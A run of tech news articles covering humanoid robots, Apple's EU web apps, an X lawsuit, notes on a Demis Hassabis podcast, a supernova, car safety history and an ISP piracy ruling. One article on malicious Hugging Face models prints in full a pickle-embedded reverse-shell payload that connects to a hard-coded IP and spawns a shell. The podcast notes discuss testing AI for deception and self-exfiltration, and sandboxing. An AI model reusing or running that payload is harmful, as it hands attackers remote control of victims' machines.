Author name: Mike M.

huge-funding-round-makes-“figure”-big-tech’s-favorite-humanoid-robot-company

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company

They’ve got an aluminum CNC machine, and they aren’t afraid to use it —

Investors Microsoft, OpenAI, Nvidia, Jeff Bezos, and Intel value Figure at $2.6B.

The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.

Enlarge / The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.

Figure

Humanoid robotics company Figure AI announced it raised $675 million in a funding round from an all-star cast of Big Tech investors. The company, which aims to commercialize a humanoid robot, now has a $2.6 billion valuation. Participants in the latest funding round include Microsoft, the OpenAI Startup Fund, Nvidia, Jeff Bezos’ Bezos Expeditions, Parkway Venture Capital, Intel Capital, Align Ventures, and ARK Invest. With all these big-name investors, Figure is officially Big Tech’s favorite humanoid robotics company. The manufacturing industry is taking notice, too. In January, Figure even announced a commercial agreement with BMW to have robots work on its production line.

“In conjunction with this investment,” the press release reads, “Figure and OpenAI have entered into a collaboration agreement to develop next generation AI models for humanoid robots, combining OpenAI’s research with Figure’s deep understanding of robotics hardware and software. The collaboration aims to help accelerate Figure’s commercial timeline by enhancing the capabilities of humanoid robots to process and reason from language.”

With all this hype and funding, the robot must be incredible, right? Well, the company is new and only unveiled its first humanoid “prototype,” the “Figure 01,” in October. At that time, the company said it represented about 12 months of work. With veterans from “Boston Dynamics, Tesla, Google DeepMind, and Archer Aviation,” the company has a strong starting point.

  • Ok, it’s time to pick up a box, so get out your oversized hands and grab hold.

    Figure

  • Those extra-big hands seem to be the focus of the robot. They are just incredibly complex and look to be aiming at a 1:1 build of a human hand.

    Figure

  • Just look at everything inside those fingers. It looks like there are tendons of some kind.

    Figure

  • Not impressed with this “pooped your pants” walk cycle, which doesn’t really use the knees or ankles.

    Figure

  • A lot of the hardware appears to be waiting for software to use it, like the screen that serves as the robot’s face. It only seems to run a screen saver.

    Figure

The actual design of the robot appears to be solid aluminum and electrically actuated, aiming for an exact 1:1 match for a human. The website says the goal is a 5-foot 6-inch, 130-lb humanoid that can lift 44 pounds. That’s a very small form-over-function package to try and fit all these robot parts into. For alternative humanoid designs, you’ve got Boston Dynamics’ Atlas, which is more of a hulking beast thanks to the function-over-form design. There’s also the more purpose-built “Digit” from Agility Robotics, which has backward-bending bird legs for warehouse work, allowing it to bend down in front of a shelf without having to worry about the knees colliding with anything.

The best insight into the company’s progress is the official YouTube channel, which shows the Figure 01 robot doing a few tasks. The last video, from a few days ago, showed a robot doing a “fully autonomous” box-moving task at “16.7 percent” of normal human speed. For a bipedal robot, I have to say the walking is not impressive. Figure has a slow, timid shuffle that only lets it wobble forward at a snail’s pace. The walk cycle is almost entirely driven by the hips. The knees are bent the entire time and always out in front of the robot; the ankles barely move. It seems only to be able to walk in a straight line, and turning is a slow stop-and-spin-in-place motion that has the feet peddling in place the entire time. The feet seem to move at a constant up-and-down motion even when the robot isn’t moving forward, almost as if foot planning just runs on a set timer for balance. It can walk, but it walks about as slowly and awkwardly as a robot can. A lot of the hardware seems built for software that isn’t ready yet.

Figure seems more focused on the hands than anything. The 01 has giant oversized hands that are a close match for a human’s, with five fingers, all with three joints each. In January, Figure posted a video of the robot working a Keurig coffee maker. That means flipping up the lid with a fingertip, delicately picking up an easily crushable plastic cup with two fingers, dropping it into the coffee maker, casually pushing the lid down with about three different fingers, and pressing the “go” button with a single finger. It’s impressive to not destroy the coffee maker or the K-cup, but that Keurig is still living a rough life—a few of the robot interactions incidentally lift one side or the other of the coffee maker off the table thanks to way too much force.

  • For some very delicate hand work, here’s the Figure 01 making coffee. They went and sourced a silver Keurig machine so this image only contains two colors, black and silver.

    Figure

  • Time to press the “go” button. Also is that a wrist-mounted lidar puck for vision? Occasionally, flashes of light shoot out of it in the video.

    Figure

  • These hand close-ups are just incredible. I really do think they are tendon-actuated. You can also see all sorts of pads on the inside of the hand.

    Figure

  • I love the ridiculous T-pose it assumes while it waits for coffee.

    Figure

The video says the coffee task was performed via an “end-to-end neural network” using 10 hours of training time. Unlike walking, the hands really feel like they have a human influence when it comes to their movement. When the robot picks up the K-cup via a pinch of its thumb and index finger or goes to push a button, it also closes the other three fingers into a fist. There isn’t a real reason to move the three fingers that aren’t doing anything, but that’s what a human would do, so presumably, it’s in the training data. Closing the lid is interesting because I don’t think you could credit a single finger with the task—it’s just kind of a casual push using whatever fingers connect with the lid. The last clip of the video even shows the Figure 01 correcting a mistake—the K-cup doesn’t sit in the coffee maker correctly, and the robot recognizes this and can poke it around until it falls into place.

A lot of assembly line jobs are done at a station or sitting down, so the focus on hand dexterity makes sense. Boston Dynamics’ Atlas is way more impressive as a walking robot, but that’s also a multi-million dollar research bot that will never see the market. Figure’s goal, according to the press release, is to “bring humanoid robots into commercial operations as soon as possible.” The company openly posts a “master plan” on its website, which reads, “1) Build a feature-complete electromechanical humanoid. 2) Perform human-like manipulation. 3) Integrate humanoids into the labor force.” The robots are coming for our jobs.

Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company Read More »

apple-changes-course,-will-keep-iphone-eu-web-apps-how-they-are-in-ios-17.4

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4

Digital Markets Act —

Alternative browsers can pin web apps, but they only run inside Apple’s WebKit.

EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.

Enlarge / EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.

Getty Images

Apple has changed its stance on allowing web apps on iPhones and iPads in Europe and will continue to let users put them on their home screens after iOS 17.4 arrives. They will, however, have to be “built directly on WebKit and its security architecture,” rather than running in alternative browsers, which is how it had worked up until new legislation forced the issue.

After the European Union’s Digital Markets Act (DMA) demanded Apple open up its mobile devices to alternative browser engines, the company said it would remove the ability to install home screen web apps entirely. In a developer Q&A section, under the heading “Why don’t users in the EU have access to Home Screen web apps?”, Apple said that “the complex security and privacy concerns” of non-native web apps and what addressing them would require “given the other demands of the DMA and the very low user adoption of Home Screen web apps,” made it so that the company “had to remove the Home Screen web apps feature in the EU.” Any web app installed on a user’s home screen would have simply led them back to their preferred web browser.

Apple further warned against “malicious web apps,” which, without the isolation built into its WebKit system, could read data, steal permissions from other web apps, and install further web apps without permission, among other concerns.

That response prompted an inquiry by the European Commission officials, who asked Apple and app developers about the impact of a potential removal of home screen web apps. It also prompted a survey conducted by the Open Web Advocacy group. Apple has until March 6 to comply with the DMA. Apple’s move to block web apps entirely suggested that allowing web apps powered by Safari, but not other browser engines, might violate the DMA’s rules. Now, some aspect of that cautious approach has changed.

Under an updated version of that section heading, Apple reiterates its security and privacy concerns and the need to “build new integration architecture that does not currently exist in iOS.” But because of requests to continue web app offerings, “we will continue to offer the existing Home Screen capability in the EU,” Apple writes.

The long, weird road to where web apps are now

Apple has long offered web apps (or Progressive Web Apps) that opened as a separate application rather than in a browser tab. Web apps installed this way offer greater persistence and access to device features, like notifications, cameras, or file storage. Web apps were initially touted by Apple co-founder and then-CEO Steve Jobs as “everything you need” to write “amazing apps” rather than dedicated apps with their own SDK. Four months later, an iPhone SDK was announced, and Apple declared its enthusiastic desire for “native third-party applications on the iPhone.”

While Apple does not break out App Store revenues in its earning statements, its Services division recorded an all-time high of $22.3 billion in the company’s fourth quarter of 2023, including “all time revenue records” across the App Store and other offerings.

As part of its DMA compliance as a “gatekeeper” of certain systems, Apple must also allow for sideloading for EU customers, or allowing the installation of iOS apps from stores other than its own official App Store. This week, more than two dozen companies signed a letter to the Commission lamenting Apple’s implementation of App Store rules. Developers seeking to utilize alternative app stores will have to agree to terms that include a “Core Technology Fee,” demanding a 0.50 euro fee for each app, each year, after 1 million downloads. “Few app developers will agree to these unjust terms,” the letter claims, and will thereby further “Apple’s exploitation of its dominance over app developers.”

In a statement provided to Ars, Apple said that its “approach to the Digital Markets Act was guided by two simple goals: complying with the law and reducing the inevitable, increased risks the DMA creates for our EU users.” It noted that Apple employees “spent months in conversation with the European Commission,” and had “in little more than a year, created more than 600 new APIs and a wide range of developer tools.” Still, Apple said, the changes and safeguards it put in place can’t entirely “eliminate new threats the DMA creates,” and the changes “will result in a less secure system.”

That is why, Apple said, it is limiting third-party browser engines, app stores, and other DMA changes to the European Union. “[W]e’re concerned about their impacts on the privacy and security of our users’ experience—which remains our North Star.”

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4 Read More »

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

judge-mocks-x-for-“vapid”-argument-in-musk’s-hate-speech-lawsuit

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

It looks like Elon Musk may lose X’s lawsuit against hate speech researchers who encouraged a major brand boycott after flagging ads appearing next to extremist content on X, the social media site formerly known as Twitter.

X is trying to argue that the Center for Countering Digital Hate (CCDH) violated the site’s terms of service and illegally accessed non-public data to conduct its reporting, allegedly posing a security risk for X. The boycott, X alleged, cost the company tens of millions of dollars by spooking advertisers, while X contends that the CCDH’s reporting is misleading and ads are rarely served on extremist content.

But at a hearing Thursday, US district judge Charles Breyer told the CCDH that he would consider dismissing X’s lawsuit, repeatedly appearing to mock X’s decision to file it in the first place.

Seemingly skeptical of X’s entire argument, Breyer appeared particularly focused on how X intended to prove that the CCDH could have known that its reporting would trigger such substantial financial losses, as the lawsuit hinges on whether the alleged damages were “foreseeable,” NPR reported.

X’s lawyer, Jon Hawk, argued that when the CCDH joined Twitter in 2019, the group agreed to terms of service that noted those terms could change. So when Musk purchased Twitter and updated rules to reinstate accounts spreading hate speech, the CCDH should have been able to foresee those changes in terms and therefore anticipate that any reporting on spikes in hate speech would cause financial losses.

According to CNN, this is where Breyer became frustrated, telling Hawk, “I’m trying to figure out in my mind how that’s possibly true, because I don’t think it is.”

“What you have to tell me is, why is it foreseeable?” Breyer said. “That they should have understood that, at the time they entered the terms of service, that Twitter would then change its policy and allow this type of material to be disseminated?

“That, of course, reduces foreseeability to one of the most vapid extensions of law I’ve ever heard,” Breyer added. “‘Oh, what’s foreseeable is that things can change, and therefore, if there’s a change, it’s ‘foreseeable.’ I mean, that argument is truly remarkable.”

According to NPR, Breyer suggested that X was trying to “shoehorn” its legal theory by using language from a breach of contract claim, when what the company actually appeared to be alleging was defamation.

“You could’ve brought a defamation case; you didn’t bring a defamation case,” Breyer said. “And that’s significant.”

Breyer directly noted that one reason why X might not bring a defamation suit was if the CCDH’s reporting was accurate, NPR reported.

CCDH’s CEO and founder, Imran Ahmed, provided a statement to Ars, confirming that the group is “very pleased with how yesterday’s argument went, including many of the questions and comments from the court.”

“We remain confident in the strength of our arguments for dismissal,” Ahmed said.

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit Read More »

notes-on-dwarkesh-patel’s-podcast-with-demis-hassabis

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis

Demis Hassabis was interviewed twice this past week.

First, he was interviewed on Hard Fork. Then he had a much more interesting interview with Dwarkesh Patel.

This post covers my notes from both interviews, mostly the one with Dwarkesh.

Hard Fork was less fruitful, because they mostly asked what for me are the wrong questions and mostly get answers I presume Demis has given many times. So I only noticed two things, neither of which is ultimately surprising.

  1. They do ask about The Gemini Incident, although only about the particular issue with image generation. Demis gives the generic ‘it should do what the user wants and this was dumb’ answer, which I buy he likely personally believes.

  2. When asked about p(doom) he expresses dismay about the state of discourse and says around 42: 00 that ‘well Geoffrey Hinton and Yann LeCun disagree so that indicates we don’t know, this technology is so transformative that it is unknown. It is nonsense to put a probability on it. What I do know is it is non-zero, that risk, and it is worth debating and researching carefully… we don’t want to wait until the eve of AGI happening.’ He says we want to be prepared even if the risk is relatively small, without saying what would count as small. He also says he hopes in five years to give us a better answer, which is evidence against him having super short timelines.

I do not think this is the right way to handle probabilities in your own head. I do think it is plausibly a smart way to handle public relations around probabilities, given how people react when you give a particular p(doom).

I am of course deeply disappointed that Demis does not think he can differentiate between the arguments of Geoffrey Hinton versus Yann LeCun, and the implied importance on the accomplishments and thus implied credibility of the people. He did not get that way, or win Diplomacy championships, thinking like that. I also don’t think he was being fully genuine here.

Otherwise, this seemed like an inessential interview. Demis did well but was not given new challenges to handle.

Demis Hassabis also talked to Dwarkesh Patel, which is of course self-recommending. Here you want to pay attention, and I paused to think things over and take detailed notes. Five minutes in I had already learned more interesting things than I did from the entire Hard Fork interview.

Here is the transcript, which is also helpful.

  1. (1: 00) Dwarkesh first asks Demis about the nature of intelligence, whether it is one broad thing or the sum of many small things. Demis says there must be some common themes and underlying mechanisms, although there are also specialized parts. I strongly agree with Demis. I do not think you can understand intelligence, of any form, without some form the concept of G.

  2. (1: 45) Dwarkesh follows up by asking then why doesn’t lots of data in one domain generalize to other domains? Demis says often it does, such as coding improving reasoning (which also happens in humans), and he expects more chain transfer.

  3. (4: 00) Dwarkesh asks what insights neuroscience brings to AI. Demis points to many early AI concepts. Going forward, questions include how brains form world models or memory.

  4. (6: 00) Demis thinks scaffolding via tree search or AlphaZero-style approaches for LLMs is super promising. He notes they’re working hard on search efficiency in many of their approaches so they can search further.

  5. (9: 00) Dwarkesh notes that Go and Chess have clear win conditions, real life does not, asks what to do about this. Demis agrees this is a challenge, but that usually ‘in scientific problems’ there are ways to specify goals. Suspicious dodge?

  6. (10: 00) Dwarkesh notes humans are super sample efficient, Demis says it is because we are not built for Monty Carlo tree search, so we use our intuition to narrow the search.

  7. (12: 00) Demis is optimistic about LLM self-play and synthetic data, but we need to do more work on what makes a good data set – what fills in holes, what fixes potential bias and makes it representative of the distribution you want to learn. Definitely seems underexplored.

  8. (14: 00) Dwarkesh asks what techniques are underrated now. Demis says things go in and out of fashion, that we should bring back old ideas like reinforcement and Q learning and combine them with the new ones. Demis really believes games are The Way, it seems.

  9. (15: 00) Demis thinks AGI could in theory come from full AlphaZero-style approaches and some people are working on that, with no priors, which you can then combine with known data, and he doesn’t see why you wouldn’t combine planning search with outside knowledge.

  10. (16: 45) Demis notes everyone has been surprised how well scaling hypothesis has held up and systems have gotten grounding and learned concepts, and that language and human feedback can contain so much grounding. From Demis: “I think we’ve got to push scaling as hard as we can, and that’s what we’re doing here. And it’s an empirical question whether that will hit an asymptote or a brick wall, and there are different people argue about that. But actually, I think we should just test it. I think no one knows. But in the meantime, we should also double down on innovation and invention.” He’s roughly splitting his efforts in half, scaling versus new ideas. He’s taking the ‘hit a wall’ hypothesis seriously.

  11. (20: 00) Demis says systems need to be grounded (in the physical world and its causes and effects) to achieve their goals and various advances are forms of this grounding, systems will understand physics better, references need for robotics.

  12. (21: 30) Dwarkesh asks about the other half, grounding in human preferences, what it takes to align a system smarter than humans. Demis says that has been at forefront of Shane and his minds since before founding DeepMind, they had to plan for success and ensure systems are understandable and controllable. The part that addresses details:

Demis Hassabis: And I think there are sort of several, this will be a whole sort of discussion in itself, but there are many, many ideas that people have from much more stringent eval systems. I think we don’t have good enough evaluations and benchmarks for things like, can the system deceive you? Can it exfiltrate its own code, sort of undesirable behaviors?

And then there are ideas of actually using AI, maybe narrow AIs, so not general learning ones, but systems that are specialized for a domain to help us as the human scientists analyze and summarize what the more general system is doing. Right. So kind of narrow AI tools.

I think that there’s a lot of promise in creating hardened sandboxes or simulations that are hardened with cybersecurity arrangements around the simulation, both to keep the AI in, but also as cybersecurity to keep hackers out. And then you could experiment a lot more freely within that sandbox domain.

And I think a lot of these ideas are, and there’s many, many others, including the analysis stuff we talked about earlier, where can we analyze and understand what the concepts are that this system is building, what the representations are, so maybe they’re not so alien to us and we can actually keep track of the kind of knowledge that it’s building.

It has been over fourteen years of thinking hard about these questions, and this is the best Demis has been able to come up with. They’re not bad ideas. Incrementally they seem helpful. They don’t constitute an answer or full path to victory or central form of a solution. They are more like a grab bag of things one could try incrementally. We are going to need to do better than that.

  1. (24: 00) Dwarkesh asks timelines, notes Shane said median of 2028. Demis sort of dodges and tries to not get pinned down but implies AGI-like systems are on track for 2030 and says he wouldn’t be surprised to get them ‘in the next decade.’

  2. (25: 00) Demis agrees AGI accelerating AI (RSI) is possible, says it depends on what we use the first AGI systems for, warning of the safety implications. The obvious follow-up question is: How would society make a choice to not use the first AGI systems for exactly this? He needs far more understanding to know even what we would need to know to know if this feedback loop was imminent.

  3. (26: 30) Demis notes deception is a root node that you very much do not want, ideally you want the AGI to give you post-hoc explanations. I increasingly think people are considering ‘deception’ as distinct from non-deception in a way that does not reflect reality, and it is an expensive and important confusion.

  4. (27: 40): Dwarkesh asks, what observations would it take to make Demis halt training of Gemini 2 because it was too dangerous? Demis answers reasonably but generically, saying we should test in sandboxes for this reason and that such issues might come up in a few years but aren’t of concern now, that the system lying about defying our instructions might be one trigger. And that then you would, ideally, ‘pause and get to the bottom of why it was doing those things’ before continuing. More conditional alarm, more detail, and especially more hard commitment, seems needed here.

  5. (28: 50) Logistical barriers are the main reason Gemini didn’t scale bigger, also you need to adjust all your parameters and go incrementally, not go more than one order of magnitude at a time. You can predict ‘training loss’ farther out but that does not tell you about actual capabilities you care about. A surprising thing about Gemini was the relationship between scoring on target metrics versus ultimate practical capabilities.

  6. (31: 30) Says Gemini 1.0 used about as much compute as ‘has been rumored for’ GPT-4. Google will have the most compute, they hope to make good use of that, and the things that scale best are what matter most.

  7. (35: 30): What should governance for these systems look like? Demis says we all need to be involved in those decisions and reach consensus on what would be good for all, and this is why he emphases things that benefit everyone like AI for science. Easy to say, but needs specifics and actual plans.

  8. (37: 30): Dwarkesh asks the good question, why haven’t LLMs automated things more than they have? Demis says for general use cases the capabilities are not there yet for things such as planning, search and long term memory for prior conversations. He mentions future recommendation systems, a pet cause of mine. I think he is underestimating that the future simply is not evenly distributed yet.

  9. (40: 42) Demis says they are working on having a safety framework like those of OpenAI and Anthropic. Right now he says they have them implicitly on safety councils and so on that people like Shane chair, but they are going to be publicly talking about it this year. Excellent.

  10. (41: 30): Dwarkesh asks about model weights security, Demis connects to open model weights right away. Demis says Google has very strong world-class protections already and DeepMind doubles down on that, says all frontier labs should take such precautions. Access is a tricky issue. For open weights, he’s all for it for things like AlphaFold or AlphaGo that can’t be misused (and those are indeed open sourced now) but his question is, for frontier models, how do we stop bad actors at all scales from misusing them if we share the weights? He doesn’t know the answer and hasn’t heard a clear one anywhere.

  11. (46: 00) Asked what safety research will be DeepMind’s specialty, Demis first mentions them pioneering RLHF, which I would say has not been going well recently and definitely won’t scale. He then mentions self-play especially for boundary testing, we need automated testing, goes back to games. Not nothing, but seems like he should be able to do better.

  12. (47: 00) Demis is excited by multimodal use cases for LLMs like Gemini, and also excited on the progress in robotics, they like that it is a data-poor regime because it forces them to do good research. Multimodality starts out harder, then makes things easier once things get going. He expects places where self-play works to see better progress than other domains, as you would expect.

  13. (52: 00) Why build science AIs rather than wait for AGI? We can bring benefits to the world before AGI, and we don’t know how long AGI will take to arrive. Also real-world problems keep you honest, give you real world feedback.

  14. (54: 30) Standard ‘things are going great’ for the merger with Google Brain, calls Gemini the first fruit of the collaboration, strongly implies the ‘twins’ that inspired the name Gemini are Google Brain and DeepMind.

  15. (57: 20) Demis affirms ‘responsible scaling policies are something that is a very good empirical way to precommit to these kinds of things.’

  16. (58: 00) Demis says if a model helped enable a bioweapon or something similar, they’d need to ‘fix that loophole,’ the important thing is to detect it in advance. I always worry about such talk, because of its emphasis on addressing specific failure modes that you foresee, rather than thinking about failures in general.

While interesting throughout, nothing here was inconsistent with what we know about Demis Hassabis or DeepMind. Demis, Shane and DeepMind are clearly very aware of the problems that lie ahead of them, are motivated to solve them, and unfortunately are still unable to express detailed plans that seem hopeful for actually doing that. Demis seemed much more aware of this confusion than Shane did, which is hopeful. Games are still central to what Demis thinks about and plans for AI.

The best concrete news is that DeepMind will be issuing its own safety framework in the coming months.

Notes on Dwarkesh Patel’s Podcast with Demis Hassabis Read More »

daily-telescope:-finally,-we’ve-found-the-core-of-a-famous-supernova

Daily Telescope: Finally, we’ve found the core of a famous supernova

A dense subject —

In the astronomy community SN 1987A has somewhat legendary status.

Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

Enlarge / Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

NASA, ESA, CSA, STScI, et. al.

Welcome to the Daily Telescope. There is a little too much darkness in this world and not enough light, a little too much pseudoscience and not enough science. We’ll let other publications offer you a daily horoscope. At Ars Technica, we’re going to take a different route, finding inspiration from very real images of a universe that is filled with stars and wonder.

Good morning. It’s February 26, and today’s image highlights the core of a (relatively) nearby supernova.

In the astronomy community, SN 1987A has somewhat legendary status. The first observable light from this exploding star in the Large Magellanic Cloud reached Earth in February, almost 37 years ago to the day. It was the first supernova that astronomers were able to observe and study with modern telescopes. It was still discussed in reverent terms a few years later when I was an undergraduate student studying astronomy at the University of Texas.

One of the enduring mysteries of the supernova is that astronomers have been unable to find its collapsed core, where they would expect to see a neutron star—an ultra-dense object that results from the supernova explosion of a massive star. In recent years, ground-based telescopes have found hints of this collapsed core, but now the James Webb Space Telescope has found emission lines that almost certainly must come from a newly born neutron star.

The astronomical details can be found here. It’s a nice validation of our understanding about supernovae.

I would also like to acknowledge that the Daily Telescope has been anything but “daily” of late. This is due to a confluence of several factors, including a lot of travel and work on other projects, including four features in the last month or so. I’ve had to put some things on the back-burner. I don’t want to stop producing these articles, but I also can’t commit to writing one every day. Maybe it should be renamed? For now, I’m just going to try to do my best. I appreciate those who have written to ask where the Daily Telescope has been—well, all of you but the person who wrote a nasty note.

Source: NASA, ESA, CSA, STScI, et. al.

Do you want to submit a photo for the Daily Telescope? Reach out and say hello.

Daily Telescope: Finally, we’ve found the core of a famous supernova Read More »

it’s-no-accident:-these-automotive-safety-features-flopped

It’s no accident: These automotive safety features flopped

safety first —

Over the years, inventors have had some weird ideas about how to make cars safer.

a toy car crashing into another toy car

Aurich Lawson | Getty Images

Turn signals have been a vehicle safety staple since they first appeared on Buicks in 1939. Of course, many drivers don’t use them, perhaps believing that other motorists can telepathically divine others’ intentions.

More people might use turn signals if they knew that drivers’ failure to do so leads to more than 2 million accidents annually, according to a study conducted by the Society of Automotive Engineers. That’s 2 percent of all crashes, according to the National Highway Traffic Safety Administration. And not using turn signals increases the likelihood of an accident by 40 percent, according to the University of Michigan Research Institute.

Human nature could be to blame—death and injury will never happen to us, only others.

You wish.

So, is it any wonder that during the first six decades of automobile production, there were few safety features? The world into which the automobile was born was one in which horses powered most transportation, but that didn’t mean getting around was safe. Say a horse got spooked. If the animal was pulling a carriage, its actions could cause the carriage to barrel away or even overturn, injuring or killing its occupants. Or the horse could cause death directly. In fact, a surprising number of kings met their end over the centuries by a horse’s swift kick. And rail travel proved even deadlier. Studies comparing modern traffic accidents with those of the early 20th century reveal that death from travel is 90 percent less likely today than it was in 1925.

Yet America’s passive acceptance of death from vehicle travel in the late 19th and early 20th century explains why auto safety was sporadically addressed, if at all. Sure, there were attempts at offering basic safety in early automobiles, like windshield wipers and improved lighting. And some safety features endured, such as Ford’s introduction of safety glass as standard equipment in 1927 or GM’s turn signals. But while other car safety features appeared from time to time, many of them just didn’t pan out.

Dead ends on the road to safer cars

Among the earliest attempts at providing safety was the O’Leary Fender, invented by John O’Leary of Cohoes, New York, in 1906. “It is made of bands of iron of such shape and design that falling into it is declared to be like the embrace of a summer girl on a moonlit night on the shore,” wrote The Buffalo News in 1919, with more than a little poetic license.

Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

Enlarge / Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

Jay Paull/Getty Images

According to the account, O’Leary was so confident of the fender’s ability to save lives that he used his own child to prove its safety. “The babe was gathered up on the folds of the fender as tenderly as it had ever been in the arms of its mother,” the newspaper reported, “and was not only uninjured but seemed to enjoy the experience.”

There’s no word on what Mrs. O’Leary thought of using the couple’s child as a crash test dummy. But the invention seemed worthy enough that an unnamed car manufacturer battled O’Leary in court over it and lost. Ultimately, his victory proved futile, as the feature was not adopted.

Others also tried to bring some measure of safety to automobiles, chief among them the Pennsylvania Rubber Company of Jeanette, Pennsylvania. The company’s idea: make a tire tread of small suction cups to improve traction. Called the Pennsylvania Vacuum Cup tire, the product proved to be popular for a while, with reports of sales outnumbering conventional tires 10 to 1, according to the Salt Lake Tribune in 1919. While Pennsylvania wasn’t the only rubber company to offer vacuum cup tires, the concept had its day before fading, although the idea does resurface from time to time.

Nevertheless, safety remained unaddressed, even as the number of deaths was rising substantially.

“Last year more than 22,000 persons were killed in or by automobiles, and something like three quarters of a million injured,” wrote The New Republic in 1926. “The number of dead is almost half as large as the list of fatalities during the nineteen months of America’s participation in the Great War.”

“The 1925 total is 10 percent larger than that for 1924,” the publication added.

The chief causes cited were the same as they are today—namely, speeding, violating the rules of the road, inattention, inexperience, and confusion. But at least one automaker—Stutz—was trying to put safety first.

It’s no accident: These automotive safety features flopped Read More »

court-blocks-$1-billion-copyright-ruling-that-punished-isp-for-its-users’-piracy

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy

A man, surrounded by music CDs, uses a laptop while wearing a skull-and-crossbones pirate hat and holding one of the CDs in his mouth.

Getty Images | OcusFocus

A federal appeals court today overturned a $1 billion piracy verdict that a jury handed down against cable Internet service provider Cox Communications in 2019. Judges rejected Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

Appeals court judges didn’t let Cox off the hook entirely, but they vacated the damages award and ordered a new damages trial, which will presumably result in a significantly smaller amount to be paid to Sony and other copyright holders. Universal and Warner are also plaintiffs in the case.

“We affirm the jury’s finding of willful contributory infringement,” said a unanimous decision by a three-judge panel at the US Court of Appeals for the 4th Circuit. “But we reverse the vicarious liability verdict and remand for a new trial on damages because Cox did not profit from its subscribers’ acts of infringement, a legal prerequisite for vicarious liability.”

